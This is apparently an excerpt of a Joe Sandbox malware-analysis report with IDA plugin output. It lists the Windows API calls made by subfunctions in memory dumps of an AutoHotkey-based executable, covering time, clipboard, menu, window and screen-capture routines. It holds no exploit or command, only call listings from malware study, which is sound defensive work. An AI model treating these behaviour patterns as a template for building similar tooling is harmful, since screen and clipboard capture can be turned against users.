    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00451D20: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451D37
      • Part of subcall function 00451D20: GetFileAttributesA.KERNEL32(?), ref: 00451D65
      • Part of subcall function 00451D20: RemoveDirectoryA.KERNEL32(?), ref: 00451D8C
      • Part of subcall function 00451D20: SHFileOperation.SHELL32 ref: 00451DE6
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 0044F400: GetSystemMetrics.USER32(00000007), ref: 0044F419
      • Part of subcall function 0044F400: GetSystemMetrics.USER32(00000007), ref: 0044F427
      • Part of subcall function 0044F400: GetSystemMetrics.USER32(00000004), ref: 0044F42F
      • Part of subcall function 0044F400: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0044F440
      • Part of subcall function 0044F400: IsWindow.USER32(00000000), ref: 0044F47A
      • Part of subcall function 0044F400: DestroyWindow.USER32(00000000), ref: 0044F48A
      • Part of subcall function 0044F400: CreateWindowExA.USER32(00000008,AutoHotkey2,?,88C00000,?,?,00000000,?,000601DA,00000000,00400000,00000000), ref: 0044F4CA
      • Part of subcall function 0044F400: GetClientRect.USER32(00000000,?), ref: 0044F4D7
      • Part of subcall function 0044F400: CreateWindowExA.USER32(00000000,static,?,50000001,00000000,00000000,?,?,00000000,00000000,00400000,00000000), ref: 0044F518
      • Part of subcall function 0044F400: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0044F534
      • Part of subcall function 0044F400: _strncpy.LIBCMT ref: 0044F552
      • Part of subcall function 0044F400: EnumFontFamiliesExA.GDI32 ref: 0044F579
      • Part of subcall function 0044F400: GetStockObject.GDI32(00000011), ref: 0044F5AC
      • Part of subcall function 0044F400: SelectObject.GDI32(00000000,00000000), ref: 0044F5B4
      • Part of subcall function 0044F400: GetTextFaceA.GDI32(00000000,00000040,?), ref: 0044F5C2
      • Part of subcall function 0044F400: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044F5CB
      • Part of subcall function 0044F400: DeleteDC.GDI32(00000000), ref: 0044F5D4
      • Part of subcall function 0044F400: CreateFontA.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0044F60F
      • Part of subcall function 0044F400: SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 0044F620
      • Part of subcall function 0044F400: ShowWindow.USER32(00000000,00000004), ref: 0044F62F
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00437A80: GetForegroundWindow.USER32 ref: 00437AE7
      • Part of subcall function 00437A80: IsIconic.USER32(00000000), ref: 00437AF8
      • Part of subcall function 00437A80: GetWindowRect.USER32(?,?), ref: 00437B10
      • Part of subcall function 00437A80: ClientToScreen.USER32(?,?), ref: 00437B32
      • Part of subcall function 00437A80: GetSystemMetrics.USER32(00000031), ref: 00437BC8
      • Part of subcall function 00437A80: GetSystemMetrics.USER32(00000032), ref: 00437BD0
      • Part of subcall function 00437A80: __Stoull.NTSTC_LIBCMT ref: 00437C16
      • Part of subcall function 00437A80: __Stoull.NTSTC_LIBCMT ref: 00437C5D
      • Part of subcall function 00437A80: _strncpy.LIBCMT ref: 00437C7B
      • Part of subcall function 00437A80: GetDC.USER32(00000000), ref: 00437ECE
      • Part of subcall function 00437A80: DestroyCursor.USER32(00000000), ref: 00437EF0
      • Part of subcall function 00437A80: DeleteObject.GDI32(00000000), ref: 00437EFB
      • Part of subcall function 00437A80: GetIconInfo.USER32(00000000,?), ref: 00437F2E
      • Part of subcall function 00437A80: DeleteObject.GDI32(?), ref: 00437F67
      • Part of subcall function 00437A80: DeleteObject.GDI32(?), ref: 00437F75
      • Part of subcall function 00437A80: CreateCompatibleDC.GDI32(?), ref: 00437FCD
      • Part of subcall function 00437A80: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00437FE8
      • Part of subcall function 00437A80: SelectObject.GDI32(00000000,00000000), ref: 00437FFE
      • Part of subcall function 00437A80: BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00438029
      • Part of subcall function 00437A80: ReleaseDC.USER32(00000000,?), ref: 00438202
      • Part of subcall function 00437A80: DeleteObject.GDI32(?), ref: 00438214
      • Part of subcall function 00437A80: SelectObject.GDI32(?,?), ref: 0043822C
      • Part of subcall function 00437A80: DeleteDC.GDI32(?), ref: 00438233
      • Part of subcall function 00437A80: DeleteObject.GDI32(?), ref: 00438242
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0044F670: GetMenu.USER32(00000000), ref: 0044F6F0
      • Part of subcall function 0044F670: GetMenuItemCount.USER32(00000000), ref: 0044F701
      • Part of subcall function 0044F670: GetMenuItemID.USER32(00000000,?), ref: 0044F787
      • Part of subcall function 0044F670: GetSubMenu.USER32(00000000,?), ref: 0044F796
      • Part of subcall function 0044F670: GetMenuItemCount.USER32(00000000), ref: 0044F79F
      • Part of subcall function 0044F670: GetMenuStringA.USER32(00000000,00000000,?,000003FF,00000400), ref: 0044F7E5
      • Part of subcall function 0044F670: CompareStringA.KERNEL32(00000400,00000001,?,00000000,?,?), ref: 0044F800
      • Part of subcall function 0044F670: CompareStringA.KERNEL32(00000400,00000001,?,?,?,?), ref: 0044F85E
      • Part of subcall function 0044F670: GetMenuItemID.USER32(00000000,00000000), ref: 0044F889
      • Part of subcall function 0044F670: GetSubMenu.USER32(00000000,00000000), ref: 0044F898
      • Part of subcall function 0044F670: GetMenuItemCount.USER32(00000000), ref: 0044F8A1
      • Part of subcall function 0044F670: PostMessageA.USER32(?,00000111,?,00000000), ref: 0044F937
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00433C70: GetWindowRect.USER32(00000000,?), ref: 00433D48
      • Part of subcall function 00433C70: GetWindowRect.USER32(00000000,?), ref: 00433D7A
      • Part of subcall function 00433C70: GetParent.USER32(00000000), ref: 00433DA5
      • Part of subcall function 00433C70: ScreenToClient.USER32(00000000,80000000), ref: 00433DB5
      • Part of subcall function 00433C70: MoveWindow.USER32(00000000,?,?,?,?,00000001), ref: 00433E5A
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004519E0: GetFullPathNameA.KERNEL32(004987E9,00000104,?,?), ref: 004519FD
      • Part of subcall function 004519E0: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451A38
      • Part of subcall function 004519E0: GetFileAttributesA.KERNEL32(?), ref: 00451A6D
      • Part of subcall function 004519E0: GetFileAttributesA.KERNEL32(?), ref: 00451A80
      • Part of subcall function 004519E0: SHFileOperation.SHELL32 ref: 00451B58
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
